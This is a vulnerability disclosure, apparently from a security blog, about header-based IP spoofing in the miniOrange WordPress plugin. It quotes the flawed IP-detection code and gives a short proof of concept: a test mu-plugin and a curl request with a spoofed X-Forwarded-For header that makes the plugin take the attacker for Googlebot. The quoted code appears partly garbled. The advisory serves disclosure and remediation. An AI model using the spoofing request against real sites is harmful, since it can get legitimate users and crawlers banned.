DOS through IP spoofing – (miniOrange <= 5.5.82)

| in

Affected pluginminiOrange
Active installs20,000+
Vulnerable version<= 5.5.82
Audited version5.5.82
Fully patched version
Recommended remediationRemoval of the plugin


The plugin is wide open to IP spoofing all over the board which an attacker can exploit to permanently ban search-engine crawlers, legitimate users, or the site’s reverse proxy.

Proof of concept

In over a couple of dozen places, the plugin uses the current IP address in a security-related context. In all cases, IP detection is vulnerable to IP spoofing because HTTP headers are blindly trusted to contain truthful information.

One of the most prominent places is inside the included Web Application Firewall (WAF).

The WAF determines the IP address using the get_ipaddress function.

function get_ipaddress()
    $ipaddress = '';
    if (isset($_SERVER['HTTP_CLIENT_IP']) && mo2f_isValidIP($_SERVER['HTTP_CLIENT_IP']))
    $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
    elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && mo2f_isValidIP($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    elseif(isset($_SERVER['HTTP_X_FORWARDED']) && mo2f_isValidIP($_SERVER['HTTP_X_FORWARDED']))
        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
    elseif(isset($_SERVER['HTTP_FORWARDED_FOR']) && mo2f_isValidIP($_SERVER['HTTP_FORWARDED_FOR']))
        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
        $ipaddress = explode(",", $ipaddress)[0];
    elseif(isset($_SERVER['HTTP_FORWARDED']) && mo2f_isValidIP($_SERVER['HTTP_FORWARDED']))
        $ipaddress = $_SERVER['HTTP_FORWARDED'];
    elseif(isset($_SERVER['REMOTE_ADDR']) && mo2f_isValidIP($_SERVER['REMOTE_ADDR']))
        $ipaddress = $_SERVER['REMOTE_ADDR'];
        $ipaddress = 'UNKNOWN';
    return $ipaddress;

This function blindly takes the value of multiple HTTP headers.

Create the following mu-plugin to verify the exploit:


// wp-content/mu-plugins/ip.php

$real_ip = '';
$_SERVER['REMOTE_ADDR'] = $real_ip
if(!isset($_SERVER['HTTP_TEST_IP'])) {

add_action('wp_loaded', function () {
    echo get_ipaddress();
    echo "\n";

Then run,

curl -X GET https://local.test -H "Test-IP: 1" -H "X-Forwarded-For:"

==> Output:, The plugin now thinks the attacker is Google-Bot.

Proposed patch

The needed patch is described in great length in this article of us.

Summary: Only ever use REMOTE_ADDR to access to current IP.


Vendor contactedSeptember 12, 2022
First ResponseSeptember 16, 2022
Fully patched at
Publicly disclosedApril 24, 2023


Leave a Reply

Your email address will not be published. Required fields are marked *